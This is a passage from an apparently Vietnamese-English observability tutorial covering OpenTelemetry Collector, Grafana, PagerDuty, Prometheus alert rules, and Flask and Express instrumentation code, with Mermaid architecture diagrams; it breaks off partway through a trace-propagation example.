prometheus:
endpoint: 0.0.0.0:8889
resource_to_telemetry_conversion:
enabled: true
# Export logs to Loki
loki:
endpoint: http://loki:3100/loki/api/v1/push
default_labels_enabled:
exporter: true
job: true
# Debug exporter (development only)
# debug:
# verbosity: detailed
extensions:
health_check:
endpoint: 0.0.0.0:13133
zpages:
endpoint: 0.0.0.0:55679
service:
extensions: [health_check, zpages]
pipelines:
traces:
receivers: [otlp]
processors: [memory_limiter, filter, tail_sampling, batch, attributes]
exporters: [otlp/jaeger]
metrics:
receivers: [otlp, prometheus, hostmetrics]
processors: [memory_limiter, batch, attributes]
exporters: [prometheus]
logs:
receivers: [otlp]
processors: [memory_limiter, batch, attributes]
exporters: [loki]
telemetry:
logs:
level: info
metrics:
address: 0.0.0.0:8888
5.4 Grafana Dashboard Provisioning
grafana/provisioning/datasources/datasources.yml:
apiVersion: 1
datasources:
- name: Prometheus
type: prometheus
access: proxy
url: http://prometheus:9090
isDefault: true
editable: false
- name: Elasticsearch
type: elasticsearch
access: proxy
url: http://elasticsearch:9200
database: "logs-*"
basicAuth: true
basicAuthUser: "grafana_reader"
jsonData:
timeField: "@timestamp"
esVersion: "8.12.0"
logMessageField: "message"
logLevelField: "log_level"
- name: Jaeger
type: jaeger
access: proxy
url: http://jaeger:16686
grafana/provisioning/dashboards/dashboards.yml:
apiVersion: 1
providers:
- name: "default"
orgId: 1
folder: "System Design Mastery"
type: file
disableDeletion: false
editable: true
options:
path: /var/lib/grafana/dashboards
foldersFromFilesStructure: true
Example Grafana Dashboard JSON (Golden Signals):
{
"dashboard": {
"title": "Golden Signals - Service Overview",
"tags": ["golden-signals", "sre", "production"],
"timezone": "browser",
"refresh": "10s",
"time": {"from": "now-1h", "to": "now"},
"panels": [
{
"title": "Request Rate (Traffic)",
"type": "timeseries",
"gridPos": {"h": 8, "w": 12, "x": 0, "y": 0},
"targets": [
{
"expr": "sum by (service) (rate(http_requests_total[5m]))",
"legendFormat": "{{service}}"
}
],
"fieldConfig": {
"defaults": {
"unit": "reqps",
"thresholds": {
"steps": [
{"color": "green", "value": null},
{"color": "yellow", "value": 2800},
{"color": "red", "value": 3500}
]
}
}
}
},
{
"title": "Error Rate (%)",
"type": "timeseries",
"gridPos": {"h": 8, "w": 12, "x": 12, "y": 0},
"targets": [
{
"expr": "sum by (service) (rate(http_requests_total{status=~\"5..\"}[5m])) / sum by (service) (rate(http_requests_total[5m])) * 100",
"legendFormat": "{{service}}"
}
],
"fieldConfig": {
"defaults": {
"unit": "percent",
"thresholds": {
"steps": [
{"color": "green", "value": null},
{"color": "yellow", "value": 0.1},
{"color": "red", "value": 1.0}
]
}
}
}
},
{
"title": "P99 Latency",
"type": "timeseries",
"gridPos": {"h": 8, "w": 12, "x": 0, "y": 8},
"targets": [
{
"expr": "histogram_quantile(0.99, sum by (le, service) (rate(http_request_duration_seconds_bucket[5m])))",
"legendFormat": "{{service}} p99"
},
{
"expr": "histogram_quantile(0.50, sum by (le, service) (rate(http_request_duration_seconds_bucket[5m])))",
"legendFormat": "{{service}} p50"
}
],
"fieldConfig": {
"defaults": {
"unit": "s",
"thresholds": {
"steps": [
{"color": "green", "value": null},
{"color": "yellow", "value": 0.2},
{"color": "red", "value": 0.5}
]
}
}
}
},
{
"title": "Resource Saturation",
"type": "gauge",
"gridPos": {"h": 8, "w": 12, "x": 12, "y": 8},
"targets": [
{
"expr": "100 - (avg by (instance) (rate(node_cpu_seconds_total{mode=\"idle\"}[5m])) * 100)",
"legendFormat": "CPU {{instance}}"
},
{
"expr": "(1 - node_memory_MemAvailable_bytes / node_memory_MemTotal_bytes) * 100",
"legendFormat": "Memory {{instance}}"
}
],
"fieldConfig": {
"defaults": {
"unit": "percent",
"min": 0,
"max": 100,
"thresholds": {
"steps": [
{"color": "green", "value": null},
{"color": "yellow", "value": 70},
{"color": "red", "value": 90}
]
}
}
}
},
{
"title": "Error Budget Remaining",
"type": "stat",
"gridPos": {"h": 4, "w": 6, "x": 0, "y": 16},
"targets": [
{
"expr": "1 - ((1 - (sum(rate(http_requests_total{status!~\"5..\"}[30d])) / sum(rate(http_requests_total[30d])))) / (1 - 0.999)) ",
"legendFormat": "Error Budget"
}
],
"fieldConfig": {
"defaults": {
"unit": "percentunit",
"thresholds": {
"steps": [
{"color": "red", "value": null},
{"color": "yellow", "value": 0.25},
{"color": "green", "value": 0.50}
]
}
}
}
}
]
}
}
5.5 PagerDuty Integration Summary
┌──────────┐ ┌──────────────┐ ┌───────────┐ ┌──────────┐
│Prometheus │───►│ Alertmanager │───►│ PagerDuty │───►│ On-call │
│ (fires │ │ (routes, │ │ │ │ Engineer │
│ alert) │ │ groups, │ │ - Phone │ │ │
│ │ │ dedup) │ │ - SMS │ │ Ack / │
│ │ │ │ │ - Push │ │ Resolve │
└──────────┘ └──────────────┘ │ - Email │ └──────────┘
│ │
│ Escalation│
│ Policy │
└───────────┘
Quy trình:
- Prometheus evaluates alert rule → fires alert
- Alertmanager receives, groups, deduplicates
- Alertmanager sends to PagerDuty via Events API v2 (sketch Python minh hoạ payload ở cuối mục này)
- PagerDuty creates incident → notifies on-call per escalation policy
- Engineer acknowledges → starts investigation
- Engineer resolves → PagerDuty updates status
- Alertmanager sends resolved → PagerDuty auto-resolves
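Để Hieu hình dung payload mà Alertmanager bắn sang PagerDuty ở bước 3, dưới đây là một sketch Python tối giản gọi thẳng Events API v2 (endpoint https://events.pagerduty.com/v2/enqueue). Đây chỉ là minh hoạ cơ chế: ROUTING_KEY là placeholder giả định, và trong production thì Alertmanager (qua pagerduty_configs) tự làm việc này, không ai gọi tay như vậy:
"""
Sketch tối giản: gửi event tới PagerDuty Events API v2.
Giả định: ROUTING_KEY là placeholder; production dùng Alertmanager pagerduty_configs.
"""
import requests

PAGERDUTY_EVENTS_URL = "https://events.pagerduty.com/v2/enqueue"
ROUTING_KEY = "<integration-routing-key>"  # placeholder, lấy từ PagerDuty service integration

def trigger_incident(summary: str, severity: str = "critical", dedup_key: str = "") -> dict:
    """event_action=trigger mở incident; các event cùng dedup_key được PagerDuty gộp lại."""
    payload = {
        "routing_key": ROUTING_KEY,
        "event_action": "trigger",          # trigger | acknowledge | resolve
        "dedup_key": dedup_key or summary,  # Alertmanager thường đặt group key ở vị trí này
        "payload": {
            "summary": summary,             # text hiện trên phone/SMS/push notification
            "source": "prometheus-alertmanager",
            "severity": severity,           # critical | error | warning | info
        },
    }
    resp = requests.post(PAGERDUTY_EVENTS_URL, json=payload, timeout=5)
    resp.raise_for_status()
    return resp.json()

def resolve_incident(dedup_key: str) -> dict:
    """event_action=resolve, tương đương Alertmanager gửi trạng thái resolved ở bước 7."""
    resp = requests.post(PAGERDUTY_EVENTS_URL, json={
        "routing_key": ROUTING_KEY,
        "event_action": "resolve",
        "dedup_key": dedup_key,
    }, timeout=5)
    resp.raise_for_status()
    return resp.json()
Điểm quan trọng là dedup_key: cùng một key thì PagerDuty gộp các event thành một incident, đúng với bước "groups, deduplicates" ở trên.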
6. Code — Instrumentation Examples
6.1 Python: Flask App with Prometheus Metrics + Structured Logging + OpenTelemetry
"""
Full observability instrumentation for a Python Flask service.
Includes: Prometheus metrics, structured logging, OpenTelemetry tracing.
"""
import time
import logging
import json
import sys
from datetime import datetime, timezone
from flask import Flask, request, g
from prometheus_client import (
Counter, Histogram, Gauge, Info,
generate_latest, CONTENT_TYPE_LATEST
)
from opentelemetry import trace
from opentelemetry.sdk.trace import TracerProvider
from opentelemetry.sdk.trace.export import BatchSpanProcessor
from opentelemetry.exporter.otlp.proto.grpc.trace_exporter import OTLPSpanExporter
from opentelemetry.instrumentation.flask import FlaskInstrumentor
from opentelemetry.instrumentation.requests import RequestsInstrumentor
from opentelemetry.propagate import set_global_textmap
from opentelemetry.propagators.b3 import B3MultiFormat
from opentelemetry.sdk.resources import Resource
# ============================================================
# 1. STRUCTURED LOGGING SETUP
# ============================================================
class StructuredJsonFormatter(logging.Formatter):
"""
Custom JSON formatter cho structured logging.
Mọi log output đều là JSON — dễ parse bởi Logstash/Fluentd/Loki.
"""
def format(self, record):
log_entry = {
"timestamp": datetime.now(timezone.utc).isoformat(),
"level": record.levelname,
"logger": record.name,
"message": record.getMessage(),
"service": "payment-service",
"instance": "payment-7b4f9d8c-x2k9p",
"version": "2.1.0",
}
# Add trace context if available
span = trace.get_current_span()
if span and span.is_recording():
ctx = span.get_span_context()
log_entry["trace_id"] = format(ctx.trace_id, "032x")
log_entry["span_id"] = format(ctx.span_id, "016x")
# Add request context if available
if hasattr(g, "request_id"):
log_entry["request_id"] = g.request_id
# Add extra fields
if hasattr(record, "extra_fields"):
log_entry.update(record.extra_fields)
# Add exception info
if record.exc_info and record.exc_info[0]:
log_entry["exception"] = {
"type": record.exc_info[0].__name__,
"message": str(record.exc_info[1]),
"traceback": self.formatException(record.exc_info),
}
return json.dumps(log_entry, default=str)
def setup_logging():
handler = logging.StreamHandler(sys.stdout)
handler.setFormatter(StructuredJsonFormatter())
root_logger = logging.getLogger()
root_logger.handlers.clear()
root_logger.addHandler(handler)
root_logger.setLevel(logging.INFO)
return logging.getLogger("payment-service")
logger = setup_logging()
# ============================================================
# 2. OPENTELEMETRY TRACING SETUP
# ============================================================
def setup_tracing(app: Flask):
resource = Resource.create({
"service.name": "payment-service",
"service.version": "2.1.0",
"deployment.environment": "production",
})
provider = TracerProvider(resource=resource)
# Export traces to OTel Collector via OTLP/gRPC
otlp_exporter = OTLPSpanExporter(
endpoint="otel-collector:4317",
insecure=True, # Use TLS in production!
)
provider.add_span_processor(BatchSpanProcessor(otlp_exporter))
trace.set_tracer_provider(provider)
# Auto-instrument Flask
FlaskInstrumentor().instrument_app(app)
# Auto-instrument outgoing HTTP requests
RequestsInstrumentor().instrument()
return trace.get_tracer("payment-service")
# ============================================================
# 3. PROMETHEUS METRICS SETUP
# ============================================================
# Service info
SERVICE_INFO = Info("service", "Service information")
SERVICE_INFO.info({
"name": "payment-service",
"version": "2.1.0",
"language": "python",
})
# Request metrics (RED method)
REQUEST_COUNT = Counter(
"http_requests_total",
"Total HTTP requests",
["method", "path", "status"]
)
REQUEST_DURATION = Histogram(
"http_request_duration_seconds",
"HTTP request duration in seconds",
["method", "path"],
buckets=[0.005, 0.01, 0.025, 0.05, 0.1, 0.25, 0.5, 1.0, 2.5, 5.0, 10.0]
)
REQUEST_SIZE = Histogram(
"http_request_size_bytes",
"HTTP request size in bytes",
["method", "path"],
buckets=[100, 500, 1000, 5000, 10000, 50000, 100000, 500000]
)
RESPONSE_SIZE = Histogram(
"http_response_size_bytes",
"HTTP response size in bytes",
["method", "path"],
buckets=[100, 500, 1000, 5000, 10000, 50000, 100000, 500000]
)
# Business metrics
PAYMENT_PROCESSED = Counter(
"payments_processed_total",
"Total payments processed",
["status", "method"] # status: success/failed, method: card/bank/wallet
)
PAYMENT_AMOUNT = Histogram(
"payment_amount_usd",
"Payment amount in USD",
["method"],
buckets=[1, 5, 10, 50, 100, 500, 1000, 5000, 10000]
)
# Resource metrics
ACTIVE_CONNECTIONS = Gauge(
"active_connections",
"Number of active connections"
)
DB_POOL_SIZE = Gauge(
"db_connection_pool_size",
"Database connection pool size",
["state"] # active, idle, waiting
)
# ============================================================
# 4. FLASK APP WITH INSTRUMENTATION
# ============================================================
app = Flask(__name__)
tracer = setup_tracing(app)
@app.before_request
def before_request():
g.start_time = time.time()
g.request_id = request.headers.get("X-Request-ID", "unknown")
ACTIVE_CONNECTIONS.inc()
@app.after_request
def after_request(response):
# Calculate duration
duration = time.time() - g.start_time
path = request.url_rule.rule if request.url_rule else request.path
# Record metrics
REQUEST_COUNT.labels(
method=request.method,
path=path,
status=response.status_code
).inc()
REQUEST_DURATION.labels(
method=request.method,
path=path
).observe(duration)
REQUEST_SIZE.labels(
method=request.method,
path=path
).observe(request.content_length or 0)
RESPONSE_SIZE.labels(
method=request.method,
path=path
).observe(response.content_length or 0)
ACTIVE_CONNECTIONS.dec()
# Structured access log
logger.info(
"Request completed",
extra={"extra_fields": {
"method": request.method,
"path": request.path,
"status_code": response.status_code,
"duration_ms": round(duration * 1000, 2),
"client_ip": request.remote_addr,
"user_agent": request.headers.get("User-Agent", ""),
"request_id": g.request_id,
}}
)
return response
@app.route("/api/v1/payments", methods=["POST"])
def process_payment():
"""Example endpoint with full instrumentation."""
with tracer.start_as_current_span("process_payment") as span:
        amount, method = 0, "unknown"  # defaults: except block vẫn label được metric/log nếu lỗi xảy ra trước khi parse xong request
        try:
data = request.get_json()
amount = data.get("amount", 0)
method = data.get("payment_method", "card")
# Add span attributes (for trace context)
span.set_attribute("payment.amount", amount)
span.set_attribute("payment.method", method)
span.set_attribute("payment.currency", "USD")
# Simulate DB call
with tracer.start_as_current_span("db_insert_payment"):
time.sleep(0.02) # Simulate DB latency
# Simulate external payment gateway call
with tracer.start_as_current_span("call_payment_gateway") as gw_span:
gw_span.set_attribute("gateway.name", "stripe")
time.sleep(0.1) # Simulate gateway latency
# Record business metrics
PAYMENT_PROCESSED.labels(status="success", method=method).inc()
PAYMENT_AMOUNT.labels(method=method).observe(amount)
logger.info("Payment processed successfully", extra={"extra_fields": {
"payment_method": method,
"amount": amount,
"event": "payment_success",
}})
return {"status": "success", "transaction_id": "txn_abc123"}, 200
except Exception as e:
PAYMENT_PROCESSED.labels(status="failed", method=method).inc()
span.record_exception(e)
span.set_status(trace.StatusCode.ERROR, str(e))
logger.error("Payment processing failed", exc_info=True, extra={"extra_fields": {
"payment_method": method,
"amount": amount,
"event": "payment_failed",
}})
return {"status": "error", "message": "Payment failed"}, 500
@app.route("/metrics")
def metrics():
"""Prometheus metrics endpoint."""
return generate_latest(), 200, {"Content-Type": CONTENT_TYPE_LATEST}
@app.route("/health")
def health():
return {"status": "healthy"}, 200
if __name__ == "__main__":
logger.info("Starting payment service", extra={"extra_fields": {"event": "startup"}})
    app.run(host="0.0.0.0", port=8082, debug=False)
6.2 Node.js: Express App with Full Observability
/**
* Full observability instrumentation for a Node.js Express service.
* Includes: Prometheus metrics, structured logging (pino), OpenTelemetry tracing.
*/
// ============================================================
// 1. OPENTELEMETRY SETUP (must be first import!)
// ============================================================
const { NodeSDK } = require("@opentelemetry/sdk-node");
const {
OTLPTraceExporter,
} = require("@opentelemetry/exporter-trace-otlp-grpc");
const {
getNodeAutoInstrumentations,
} = require("@opentelemetry/auto-instrumentations-node");
const { Resource } = require("@opentelemetry/resources");
const {
SEMRESATTRS_SERVICE_NAME,
SEMRESATTRS_SERVICE_VERSION,
SEMRESATTRS_DEPLOYMENT_ENVIRONMENT,
} = require("@opentelemetry/semantic-conventions");
const sdk = new NodeSDK({
resource: new Resource({
[SEMRESATTRS_SERVICE_NAME]: "order-service",
[SEMRESATTRS_SERVICE_VERSION]: "1.5.0",
[SEMRESATTRS_DEPLOYMENT_ENVIRONMENT]: "production",
}),
traceExporter: new OTLPTraceExporter({
url: "grpc://otel-collector:4317",
}),
instrumentations: [
getNodeAutoInstrumentations({
"@opentelemetry/instrumentation-fs": { enabled: false }, // noisy
}),
],
});
sdk.start();
// ============================================================
// 2. STRUCTURED LOGGING (pino)
// ============================================================
const pino = require("pino");
const { trace, context } = require("@opentelemetry/api");
const logger = pino({
level: process.env.LOG_LEVEL || "info",
formatters: {
level(label) {
return { level: label };
},
},
mixin() {
// Inject trace context into every log line
const span = trace.getSpan(context.active());
if (span) {
const ctx = span.spanContext();
return {
trace_id: ctx.traceId,
span_id: ctx.spanId,
};
}
return {};
},
base: {
service: "order-service",
version: "1.5.0",
environment: "production",
},
// PII redaction paths
redact: {
paths: [
"req.headers.authorization",
"req.headers.cookie",
"body.password",
"body.credit_card",
"body.ssn",
"user.email",
],
censor: "[REDACTED]",
},
timestamp: pino.stdTimeFunctions.isoTime,
});
// ============================================================
// 3. PROMETHEUS METRICS
// ============================================================
const promClient = require("prom-client");
const { register } = promClient;
// Default metrics (Node.js runtime: event loop, GC, memory, etc.)
promClient.collectDefaultMetrics({
prefix: "nodejs_",
gcDurationBuckets: [0.001, 0.01, 0.1, 1, 2, 5],
});
// RED metrics
const httpRequestsTotal = new promClient.Counter({
name: "http_requests_total",
help: "Total number of HTTP requests",
labelNames: ["method", "path", "status"],
});
const httpRequestDuration = new promClient.Histogram({
name: "http_request_duration_seconds",
help: "HTTP request duration in seconds",
labelNames: ["method", "path"],
buckets: [0.005, 0.01, 0.025, 0.05, 0.1, 0.25, 0.5, 1, 2.5, 5, 10],
});
const httpRequestSize = new promClient.Histogram({
name: "http_request_size_bytes",
help: "HTTP request payload size",
labelNames: ["method", "path"],
buckets: [100, 500, 1000, 5000, 10000, 50000, 100000],
});
// Business metrics
const ordersCreated = new promClient.Counter({
name: "orders_created_total",
help: "Total orders created",
labelNames: ["status"],
});
const orderAmount = new promClient.Histogram({
name: "order_amount_usd",
help: "Order amount in USD",
buckets: [10, 50, 100, 500, 1000, 5000],
});
const activeWebSockets = new promClient.Gauge({
name: "active_websocket_connections",
help: "Number of active WebSocket connections",
});
// ============================================================
// 4. EXPRESS APP
// ============================================================
const express = require("express");
const app = express();
app.use(express.json());
// Metrics middleware
app.use((req, res, next) => {
const start = process.hrtime.bigint();
res.on("finish", () => {
const duration = Number(process.hrtime.bigint() - start) / 1e9;
const path = req.route?.path || req.path;
// Skip metrics endpoint from recording
if (path === "/metrics" || path === "/health") return;
httpRequestsTotal.inc({
method: req.method,
path: path,
status: res.statusCode,
});
httpRequestDuration.observe(
{ method: req.method, path: path },
duration
);
httpRequestSize.observe(
{ method: req.method, path: path },
parseInt(req.headers["content-length"] || "0", 10)
);
// Structured access log
logger.info({
msg: "Request completed",
method: req.method,
path: req.path,
status_code: res.statusCode,
duration_ms: Math.round(duration * 1000),
client_ip: req.ip,
request_id: req.headers["x-request-id"] || "unknown",
});
});
next();
});
// Routes
app.post("/api/v1/orders", async (req, res) => {
const tracer = trace.getTracer("order-service");
try {
const { items, total_amount } = req.body;
logger.info({
msg: "Processing new order",
items_count: items?.length,
total_amount,
event: "order_processing",
});
// Simulate order processing
await new Promise((resolve) => setTimeout(resolve, 50));
// Record business metrics
ordersCreated.inc({ status: "success" });
orderAmount.observe(total_amount || 0);
logger.info({
msg: "Order created successfully",
order_id: "ord_xyz789",
total_amount,
event: "order_created",
});
res.status(201).json({
status: "success",
order_id: "ord_xyz789",
});
} catch (err) {
ordersCreated.inc({ status: "failed" });
logger.error({
msg: "Order creation failed",
error: err.message,
stack: err.stack,
event: "order_failed",
});
res.status(500).json({ status: "error", message: "Order failed" });
}
});
// Prometheus metrics endpoint
app.get("/metrics", async (req, res) => {
res.set("Content-Type", register.contentType);
res.end(await register.metrics());
});
// Health check
app.get("/health", (req, res) => {
res.json({ status: "healthy", uptime: process.uptime() });
});
const PORT = process.env.PORT || 8083;
app.listen(PORT, () => {
logger.info({ msg: `Order service started on port ${PORT}`, event: "startup" });
});
// Graceful shutdown
process.on("SIGTERM", async () => {
logger.info({ msg: "Received SIGTERM, shutting down gracefully", event: "shutdown" });
await sdk.shutdown();
process.exit(0);
});6.3 Alerting Rules YAML (Prometheus)
prometheus/alert-rules.yml:
groups:
# ===========================================================
# GOLDEN SIGNALS ALERTS
# ===========================================================
- name: golden_signals
rules:
# --- LATENCY ---
- alert: HighP99Latency
expr: |
histogram_quantile(0.99,
sum by (le, service) (rate(http_request_duration_seconds_bucket[5m]))
) > 0.5
for: 5m
labels:
severity: high
category: performance
annotations:
summary: "P99 latency > 500ms for {{ $labels.service }}"
description: "P99 latency is {{ $value | humanizeDuration }} for service {{ $labels.service }}"
runbook_url: "https://wiki.internal/runbooks/high-latency"
- alert: CriticalP99Latency
expr: |
histogram_quantile(0.99,
sum by (le, service) (rate(http_request_duration_seconds_bucket[5m]))
) > 2.0
for: 2m
labels:
severity: critical
category: performance
annotations:
summary: "P99 latency > 2s for {{ $labels.service }}"
runbook_url: "https://wiki.internal/runbooks/critical-latency"
# --- ERRORS ---
- alert: HighErrorRate
expr: |
sum by (service) (rate(http_requests_total{status=~"5.."}[5m]))
/
sum by (service) (rate(http_requests_total[5m]))
> 0.01
for: 5m
labels:
severity: high
category: errors
annotations:
summary: "Error rate > 1% for {{ $labels.service }}"
description: "Error rate is {{ $value | humanizePercentage }} for service {{ $labels.service }}"
runbook_url: "https://wiki.internal/runbooks/high-error-rate"
- alert: CriticalErrorRate
expr: |
sum by (service) (rate(http_requests_total{status=~"5.."}[5m]))
/
sum by (service) (rate(http_requests_total[5m]))
> 0.05
for: 2m
labels:
severity: critical
category: errors
annotations:
summary: "Error rate > 5% for {{ $labels.service }}"
runbook_url: "https://wiki.internal/runbooks/critical-error-rate"
# --- TRAFFIC ---
- alert: TrafficAnomaly
expr: |
sum(rate(http_requests_total[5m]))
>
2 * avg_over_time(sum(rate(http_requests_total[5m]))[7d:1h])
for: 10m
labels:
severity: warning
category: traffic
annotations:
summary: "Traffic is 2x above 7-day average"
description: "Current QPS: {{ $value | humanize }}. Could be organic growth or DDoS."
- alert: ZeroTraffic
expr: sum(rate(http_requests_total[5m])) == 0
for: 5m
labels:
severity: critical
category: traffic
annotations:
summary: "Zero traffic detected — possible total outage"
runbook_url: "https://wiki.internal/runbooks/zero-traffic"
# --- SATURATION ---
- alert: HighCPUUsage
expr: |
100 - (avg by (instance) (rate(node_cpu_seconds_total{mode="idle"}[5m])) * 100) > 85
for: 10m
labels:
severity: warning
category: saturation
annotations:
summary: "CPU usage > 85% on {{ $labels.instance }}"
- alert: HighMemoryUsage
expr: |
(1 - node_memory_MemAvailable_bytes / node_memory_MemTotal_bytes) * 100 > 90
for: 5m
labels:
severity: high
category: saturation
annotations:
summary: "Memory usage > 90% on {{ $labels.instance }}"
- alert: DiskSpaceLow
expr: |
(1 - node_filesystem_avail_bytes{mountpoint="/"} / node_filesystem_size_bytes{mountpoint="/"}) * 100 > 85
for: 15m
labels:
severity: warning
category: saturation
annotations:
summary: "Disk usage > 85% on {{ $labels.instance }}"
description: "Disk will be full in {{ $value | humanizeDuration }} at current rate"
- alert: DiskWillFillIn7Days
expr: |
predict_linear(node_filesystem_avail_bytes{mountpoint="/"}[7d], 7*24*3600) < 0
for: 1h
labels:
severity: high
category: saturation
annotations:
summary: "Disk predicted to fill within 7 days on {{ $labels.instance }}"
# ===========================================================
# SLO-BASED BURN RATE ALERTS
# ===========================================================
- name: slo_burn_rate
rules:
# SLO: 99.9% availability (error budget = 0.1%)
# Burn rate 14.4x → budget exhausted in ~2 days
- alert: SLOBurnRateCritical
expr: |
(
sum(rate(http_requests_total{status=~"5.."}[5m]))
/
sum(rate(http_requests_total[5m]))
) > (14.4 * 0.001)
and
(
sum(rate(http_requests_total{status=~"5.."}[1h]))
/
sum(rate(http_requests_total[1h]))
) > (14.4 * 0.001)
for: 2m
labels:
severity: critical
category: slo
annotations:
summary: "SLO burn rate > 14.4x — error budget exhausts in ~2 days"
runbook_url: "https://wiki.internal/runbooks/slo-burn-rate"
# Burn rate 6x → budget exhausted in ~5 days
- alert: SLOBurnRateHigh
expr: |
(
sum(rate(http_requests_total{status=~"5.."}[30m]))
/
sum(rate(http_requests_total[30m]))
) > (6 * 0.001)
and
(
sum(rate(http_requests_total{status=~"5.."}[6h]))
/
sum(rate(http_requests_total[6h]))
) > (6 * 0.001)
for: 5m
labels:
severity: high
category: slo
annotations:
summary: "SLO burn rate > 6x — error budget exhausts in ~5 days"
# ===========================================================
# SECURITY ALERTS
# ===========================================================
- name: security_alerts
rules:
- alert: HighRateOf401
expr: |
sum(rate(http_requests_total{status="401"}[5m])) > 50
for: 2m
labels:
severity: high
category: security
annotations:
summary: "High rate of 401 Unauthorized — possible brute force attack"
runbook_url: "https://wiki.internal/runbooks/auth-attack"
- alert: HighRateOf403
expr: |
sum(rate(http_requests_total{status="403"}[5m])) > 100
for: 2m
labels:
severity: high
category: security
annotations:
summary: "High rate of 403 Forbidden — possible enumeration attack"
- alert: SuspiciousTrafficSpike
expr: |
sum(rate(http_requests_total[1m]))
>
5 * avg_over_time(sum(rate(http_requests_total[1m]))[1d:5m])
for: 5m
labels:
severity: critical
category: security
annotations:
summary: "Traffic spike 5x above daily average — possible DDoS"
runbook_url: "https://wiki.internal/runbooks/ddos-response"
# ===========================================================
# MONITORING THE MONITORING (Meta-monitoring)
# ===========================================================
- name: meta_monitoring
rules:
- alert: PrometheusTargetDown
expr: up == 0
for: 3m
labels:
severity: high
category: monitoring
annotations:
summary: "Prometheus target {{ $labels.instance }} is down"
- alert: PrometheusStorageFull
expr: |
prometheus_tsdb_storage_blocks_bytes / (50 * 1024^3) > 0.85
for: 15m
labels:
severity: warning
category: monitoring
annotations:
summary: "Prometheus storage > 85% of 50GB limit"
- alert: AlertmanagerNotificationFailed
expr: |
rate(alertmanager_notifications_failed_total[5m]) > 0
for: 5m
labels:
severity: high
category: monitoring
annotations:
summary: "Alertmanager failing to send notifications via {{ $labels.integration }}"
- alert: HighCardinalitySeries
expr: prometheus_tsdb_head_series > 500000
for: 15m
labels:
severity: warning
category: monitoring
annotations:
summary: "Prometheus tracking {{ $value }} active series — cardinality may be too high"7. Mermaid Diagrams
7.1 Observability Stack Architecture
flowchart TB
    subgraph "Application Layer"
        A1[Service A<br/>Python/Flask]
        A2[Service B<br/>Node.js/Express]
        A3[Service C<br/>Go/Gin]
    end
    subgraph "Collection Layer"
        direction TB
        P[Prometheus<br/>Scrapes /metrics<br/>every 15s]
        OC[OpenTelemetry<br/>Collector]
        FB[Filebeat<br/>Log Shipper]
    end
    subgraph "Processing Layer"
        LS[Logstash<br/>Parse · Filter PII<br/>Transform · Enrich]
    end
    subgraph "Storage Layer"
        TSDB[(Prometheus TSDB<br/>Metrics · 30d)]
        ES[(Elasticsearch<br/>Logs · 90d)]
        JG[(Jaeger<br/>Traces · 7d)]
    end
    subgraph "Visualization Layer"
        GR[Grafana<br/>Dashboards]
        KB[Kibana<br/>Log Search]
        JU[Jaeger UI<br/>Trace Explorer]
    end
    subgraph "Alerting Layer"
        AM[Alertmanager<br/>Route · Group · Dedup]
        PD[PagerDuty<br/>Escalation]
        SL[Slack<br/>Notifications]
        EM[Email<br/>Reports]
    end
    %% Data Flow
    A1 & A2 & A3 -->|"/metrics"| P
    A1 & A2 & A3 -->|"OTLP gRPC"| OC
    A1 & A2 & A3 -->|"stdout/files"| FB
    P -->|"store"| TSDB
    OC -->|"traces"| JG
    OC -->|"metrics"| TSDB
    FB -->|"ship"| LS
    LS -->|"index"| ES
    TSDB --> GR
    ES --> KB
    ES --> GR
    JG --> JU
    JG --> GR
    P -->|"alert rules"| AM
    AM --> PD
    AM --> SL
    AM --> EM
    style P fill:#e65100,stroke:#333,color:#fff
    style GR fill:#f9a825,stroke:#333
    style AM fill:#c62828,stroke:#333,color:#fff
    style OC fill:#1565c0,stroke:#333,color:#fff
    style ES fill:#2e7d32,stroke:#333,color:#fff
7.2 Alert Escalation Flow
flowchart TD
    A[Prometheus<br/>Alert Rule Fires] --> B{Alertmanager<br/>Receives Alert}
    B --> C{Severity?}
    C -->|P1 Critical| D[PagerDuty<br/>+ Slack #incidents]
    C -->|P2 High| E[Slack #incidents]
    C -->|P3 Warning| F[Slack #alerts]
    C -->|P4 Info| G[Email / Dashboard]
    D --> H{On-call Primary<br/>Ack in 5min?}
    H -->|Yes| I[Primary Investigates]
    H -->|No| J{On-call Secondary<br/>Ack in 10min?}
    J -->|Yes| K[Secondary Investigates]
    J -->|No| L{Engineering Manager<br/>Ack in 15min?}
    L -->|Yes| M[Manager Coordinates]
    L -->|No| N[VP/CTO Notified<br/>War Room Opened]
    I --> O{Resolved?}
    K --> O
    M --> O
    N --> O
    O -->|Yes| P[Alertmanager sends<br/>RESOLVED notification]
    O -->|No, > 30 min| Q[Incident Commander<br/>Declared]
    P --> R[Postmortem<br/>within 48h]
    Q --> S[Cross-team Response<br/>Status Page Updated]
    S --> O
    E --> T[On-call Reviews<br/>within 30min]
    F --> U[Team Reviews<br/>within 4h]
    style D fill:#c62828,stroke:#333,color:#fff
    style N fill:#c62828,stroke:#333,color:#fff
    style P fill:#2e7d32,stroke:#333,color:#fff
    style Q fill:#e65100,stroke:#333,color:#fff
7.3 Request Lifecycle with Observability
sequenceDiagram
    participant U as User
    participant GW as API Gateway
    participant OS as Order Service
    participant PS as Payment Service
    participant DB as Database
    participant P as Prometheus
    participant L as Logstash/ES
    participant J as Jaeger
    Note over U,J: trace_id: abc-123 propagated via W3C headers
    U->>GW: POST /api/orders
    activate GW
    Note right of GW: span_id: s1<br/>Log: "Received request"<br/>Metric: request_count++
    GW->>OS: Forward + traceparent header
    activate OS
    Note right of OS: span_id: s2 (parent: s1)<br/>Log: "Processing order"<br/>Metric: order_count++
    OS->>PS: POST /internal/payments
    activate PS
    Note right of PS: span_id: s3 (parent: s2)<br/>Log: "Processing payment"
    PS->>DB: INSERT payment
    activate DB
    Note right of DB: span_id: s4 (parent: s3)<br/>Metric: db_query_duration
    DB-->>PS: OK
    deactivate DB
    PS-->>OS: Payment confirmed
    deactivate PS
    OS-->>GW: Order created
    deactivate OS
    GW-->>U: 201 Created
    deactivate GW
    Note over P: Scrapes /metrics every 15s<br/>Records: latency, QPS, errors
    Note over L: Receives structured logs<br/>Indexes in Elasticsearch
    Note over J: Receives trace spans<br/>Builds trace waterfall view
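Một sketch Python nhỏ minh hoạ cơ chế propagate traceparent trong diagram trên. Giả định tracer đã được setup như section 6.1; thực tế RequestsInstrumentor đã tự inject header cho thư viện requests, sketch này chỉ để em thấy rõ điều gì xảy ra với một HTTP client không được auto-instrument:
"""
Sketch: propagate W3C traceparent header thủ công khi gọi service downstream.
Giả định: tracer/provider đã setup như section 6.1; URL và payload chỉ để minh hoạ.
"""
import requests
from opentelemetry import trace
from opentelemetry.propagate import inject

tracer = trace.get_tracer("order-service")

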